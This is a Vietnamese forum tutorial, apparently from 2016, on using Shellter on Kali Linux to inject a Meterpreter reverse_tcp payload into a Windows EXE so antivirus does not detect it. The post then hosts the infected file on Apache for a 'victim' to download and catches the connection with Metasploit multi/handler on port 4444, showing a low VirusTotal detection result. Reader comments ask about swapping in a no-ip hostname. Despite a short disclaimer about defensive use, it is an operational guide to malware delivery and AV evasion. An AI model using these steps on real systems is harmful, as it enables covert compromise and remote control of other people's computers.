Bypass Anti-Virus với Shellter trên Kali linux 2.0

bamboo76114

W-------
01/03/2016
9
7 bài viết
Bypass Anti-Virus với Shellter trên Kali linux 2.0
Giới thiệu Trên Phiên bản Kali Linux 1.0 chúng ta đã biết tới Veil-Evasion, một công cụ để Bypass AV khá mạnh với nhiều Payload tuy nhiên gần đây có một số Payload đã bị AV nhận diện được và một điều nữa là việc tải và cài đặt Veil-Evasion khá lâu. Sang phiên bản Kali 2.0, Shellter sẽ là một sự lựa chọn mới dành cho Pentester. Được ban hành trong năm 2015, cho đến hiện tại Shellter vẫn có thể bypass hầu hết các AV với tính năng mã hóa và giải mã đa hình, tỷ lệ bị phát hiện trên Virustotal là rất thấp thậm chí là không có.
Cách cài đặt và sử dụng
Tại cửa sổ Terminal: apt-get install shellter --> shellter sau đó click Install để bắt đầu cài đặt.
1489939948K03.png
Bước tiếp ta nhập 'A' để chọn chế độ Auto, M để tự tùy chỉnh và H để được hướng dẫn.
1489939948K05.png
Sau khi nhập 'A' ta nhập tên file thực thi dạng EXE, file này phải được đặt cùng thư mục chạy Shellter, trong trường hợp này là /root/
1489939948K06.png
Tiếp theo là chọn Payload. Đầu tiên ta nhập "L" để sử dụng danh sách Payload có ở trên sau đó nhập số thứ tự của Payload cần dùng rồi IP của Kali và cuối cùng là cổng kết nối ( mình chọn 4444 ).
1489939948K08.png
Cuối cùng ta ấn Enter để kết thúc.
1489939948K09.png
1489939948K10.png
Sau khi tiêm mã độc vào file xong, ta copy vào thư mục /var/www/html/ rồi nhập service apache2 start để victim có thể truy cập và tải về file virus.
1489939948K11.png
Ta vào sẵn Metasploit: use multi/handler --> set payload windows/meterpreter/reverse_tcp --> set lhost 'IP của Kali' --> 4444 --> exploit
1489939948K12.png
Trên máy victim tải về và mở file virus.
1489939948K13.png
Kali đã kết nối được tới máy Victim, giờ ta có thể làm nhiều việc đối với máy victim thông qua dòng lệnh.
1489939948K14.png
Đây là kết quả test trên Virustotal.com
1489939948K15.png

Video Demo
[video=youtube;_t_zPG0dJYI]https://www.youtube.com/watch?v=_t_zPG0dJYI[/video]
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  • Thích
Reactions: chaien
Mặc định là dùng port 4444 ạ?
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  • Thích
Reactions: HustReMw
Comment
mình có thể dùng no-ip , để thay thế sethostip và port 4444, được không bạn nhỉ ?
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bên trên